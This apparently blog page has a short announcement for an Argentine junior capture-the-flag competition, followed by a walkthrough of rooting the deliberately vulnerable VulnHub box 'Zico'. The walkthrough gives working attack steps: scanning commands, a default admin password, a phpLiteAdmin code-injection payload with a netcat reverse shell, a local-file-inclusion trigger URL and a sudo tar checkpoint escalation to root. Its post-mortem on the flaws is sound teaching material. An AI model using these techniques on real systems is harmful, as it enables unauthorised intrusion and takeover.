Articles by "CTF"
Showing posts with label CTF. Show all posts



Capture The Flag (CTF in English) is a computer security competition that allows learning issues related to computer security in a fun way. These types of skills are usually of two types. The CTF of the jeopardy type have challenges that, when resolved, give us a secret text called a flag or flag . This flag is nothing more than a text under a specific format (in this case FLAG = { characters-that-are-changing }  ), and once found it will let us know that we solved the challenge. The junior CTF corresponds to this category.
A second type of CTF is called attack-defense. In it, each team must defend a server or a network with vulnerable services from the rest of the teams.

What is the junior CTF?

It is an annual computer security competition in the form of a CTF aimed at people who want to take their first steps in the area of ​​computer security in a playful way.

General CTF issues

Categories & Challenges

There are 6 possible categories: reverse engineering, forensics, web, SQL injection, cryptography and networks. The challenges are of increasing difficulty and the greater the difficulty of the exercise, the higher the score.

Teams

The challenges can be solved individually or by teams of up to 3 people.

Platform

Once a challenge has been resolved and the flag identified, this text should be entered on the platform where the challenges are downloaded and, if correct, the points will be automatically added to the team.

Flag format

The format of the flag of all challenges is FLAG = { characters-that-are-changing }  
they are 32 hexadecimal characters. 
The text-changing- always has 32 hexadecimal characters regardless of upper or lower case. An example FLAG would be: FLAG = {0123456789abcdef0123456789abcdef}

Awards

1st prize tickets to the Ekoparty and Kit Raspberry  Pi.
2nd prize tickets to the Ekoparty and Arduino Kit.
 3rd prize tickets to the Ekoparty.
If a winning team has 3 members, each of them will take the indicated prize.

Requirements

  • Bring computer.
  • We recommend that you have Virtualbox installed or the possibility of booting from a USB the image of Kali Linux .
  • Be physically present at OLX Argentina to participate (Miñones 2177, CABA, Argentina).
  • No previous knowledge in computer security is necessary. It will be useful to have general computer knowledge such as Linux environment management and basic programming.
  • Not work or have worked in the area of ​​computer security or have previously participated in a CTF, given the introductory nature of the event (except for the previous editions of the CTF Junior).

Zico on VulnHub


12 March 2017

Introduction

My friends and I like to solve CTFs on our own, then teach each other how we solved it. This way, we get experience both teaching and learning, and you always understand material you need to explain to someone else better than if you kept it to yourself.
Zico’s author rates the box as “intermediate,” but I’d call it “beginner plus.” The ideas needed to root the box are not complicated, but you need to have a bit of prior knowledge to know that you need to implement them.
Shall we begin?

1. Initial Scanning

Since we are dealing with a VulnHub VM, we need to set it up on our HOST ONLY
network. This box is intentionally vulnerable, why hook it up to your real network?
Depending on how you’ve set up your host-only network, you may need to use nmap to determine the machine’s IP.
nmap -sn 192.168.56.0/24

a1
Once you’ve found the box, it’s time to give it a real portscan.
I like to use my benmap script, which runs a few scans and generates
a working directory for the CTF. You can check it out on Github.

a2_1a2_2
The nmap -F scan found some potential avenues of attack:
  • SSH on port 22
  • HTTP on port 80
  • rpcbind on port 111
HTTP is my favorite place to start on CTF’s, so we hit it with the
triple threat: niktodirsearch and fimap
nikto -h 192.168.56.101 -o nikto_result.txt

a3
Nikto tells us that Apache is a bit obsolete, but nothing else particularly interesting.
Throw that on our “places to dig” list and let’s use dirsearch.
dirsearch -u 'http://192.168.56.101' -e php,html,js,txt,sh --simple-report=dirsearch_quick

a4
We find a lot of interesting filenames, especially the dbadmin directory.
Anything with “admin” in the title may be worth a look.
Finally, we’ll let fimap see if we can dig anywhere we aren’t supposed to be able to. 
fimap -H -d 3 -u "http://192.168.56.101" -w /tmp/fimap_output | tee fimap_result

a5a
http://hostname/view.php?page=tools.html smells like file inclusion. 
The use of ?page= may allow us to directly view arbitrary files on the webserver. Instead of using tools.html as an argument, we just insert a file’s full path.
I tried something like ../../../../etc/passwd, but didn’t find success. Maybe we can use this later.
Lastly, we peruse the site in the browser.

a5
Zico’s Shop?
Zico doesn’t seem confident that he is in control of his own site.
Let’s prove that he is right to have doubts and go right for that /dbadmin page.

a6
What have we here?

a7

2. Doing Dirty Deeds in da Database

A php database page, with an obvious version number. The title of “testdb” hints at a default setup.
A default setup may use a default password.
password: admin

a8
We’re inside.
Those look like password hashes to me.
Our friend Hashbuster should have a look at them.

a9
Not too shabby! Root and user passwords.
I don’t think this db is actually used for anything other than testing, but there is a chance that the same passwords are used to login with SSH.

a10 
Nope.
We can see some other useful information on the database page, however.
For one, we are given the test_user database’s full file path.

filepath
This information, combined with the Local File Inclusion vulnerability we spotted earlier means we can access these databases by visiting a URL.
We can try some tricks using SQL commands, but I wonder if
these waters have been charted before…
findsploit phpliteadmin

a11
The very first hit matches our phpLiteAdmin version number. 
If you run searchsploit -x 24044, you’ll see a document explaining how the exploit is operated.
We’ll break it down, step by step.
  • Create a new database with a name ending in “.php” a13
  • Select this new database and create a new table with one field. a14
  • Set the field to the “Text” type, and enter a php-command payload as the Default Value.
    I decided to use my most reliable netcat-based reverse-shell.

    &1|nc local.machine.ip.addr PORTNUM > /tmp/f"); ?>
a15
  • Create the table, and set up the listener on your local machine.
nc -lnvp PORTNUM

a16 
  • Visiting the database in the browser, using our handy-dandy LFI vulnerability will run the payload and pop our shell.
http://192.168.56.101/view.php?page=../../../../usr/databases/a.php

a17

3. From www-data to User

This shell could use some improvement, so let’s see if we can’t spawn a bash shell with a tty using python.
which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'

a18 
My “advanced” powers of deduction tell me that we are going to have a user named zico. A user with a home directory, even.
Let’s verify.
ls -la /home
ls -la /home/zico 
a19
Luckily for us, Zico doesn’t seem to mind if we read files in his home directory.
Talk about courteous!
Zico seems to have even left a note behind for himself.
Surely he won’t mind if we read that, too.
cd /home/zico
cat to_do.txt 
a20 
Zico seems to be trying out some content management systems for a new website.
The site we got through in order to get this shell used phpliteadmin, so Wordpress must be next. 
We see Wordpress sites all the time in CTFs, and know it well enough to know where to look for the squishy bits.
cd wordpress
ls -l 
a21
Zico hasn’t implemented this site yet, so it may not have been combed through for sensitive info.
wp-config.php can often contain passwords.
grep -i 'pass' wp-config.php

a22 
A database password, nice.
Let’s try it with SSH, because, why not?
a23

4. From Zico to Root

As the presumed owner of this box, Zico should be able to get some significant things done. 
sudo -l
a24
tar and zip are a bit strange to see as sudo-enabled commands. Can they be used for code execution?
I searched online, and found some very interesting information at these two sites.
tar can be run with flags that cause it to unarchive with “checkpoints.”
At these points, the process will pause and take an action, then seamlessly resume. 
Since we can run tar as root, we just need to use these checkpoints to run some commands that escalate our privileges.

Running Tar As Root For Fun and Profit

  • Move to a “temporary” folder like /dev/shm and create a file that we will compress.
  • Compress it with tar as Zico. No need to run as root just yet.

a25 
  • Unarchive the newly created .tar, making sure to use sudo and including the flags to add a checkpoint and commands.
    The commands will run along with the .tar command, so any output from the commands will appear in the terminal
    Our test payload is the (redundant) command echo $(id), which will output the info belonging to the user who ran the tar command to the terminal.

    If things go according to plan, we should see root’s info.
sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)'

a26
Our privesc concept is proven.
We can just run /bin/bash as our checkpoint commands to spawn a root shell.
sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'

a27
And, we’re root.
Go to the /root directory and grab the flag.
cd /root
ls
cat flag.txt

a28 

Post-Mortem

This CTF was made purposefully made porous, but these vulnerabilities can be found in the real world.
Here’s what made Zico rootable.
Use of Default/Obvious Credentials
  • In this scenario, Zico’s phpLiteAdmin database was just for testing purposes. However, adminis simply not a password that should be in use. It’s just too easy to guess.
  • Had we not been able to gain access to the phpLiteAdmin panel, we may not have gotten any access at all.
Local File Inclusion
  • Serving webpages with ?page= is a recipe for local file inclusion.
  • Only one page was intended to reached this way, and it wasn’t even the only link to this page on the site.
Outdated Versions of 3rd Party Software
  • The phpLiteAdmin version used here isn’t even available for download from the phpLiteAdmin website.
  • The code injection vulnerability we used to run our php payload was patched away in later versions.
Credential Reuse
  • The password by www-data in the wp-config.php file to access the website database was the same as the user’s password.
Least Privilege Violations
  • www-data had unneccessary read access to zico’s home folder.
  • If zico isn’t a superuser, I’m not sure what reason they would need to have to run tar and zip as root.

Thanks for reading!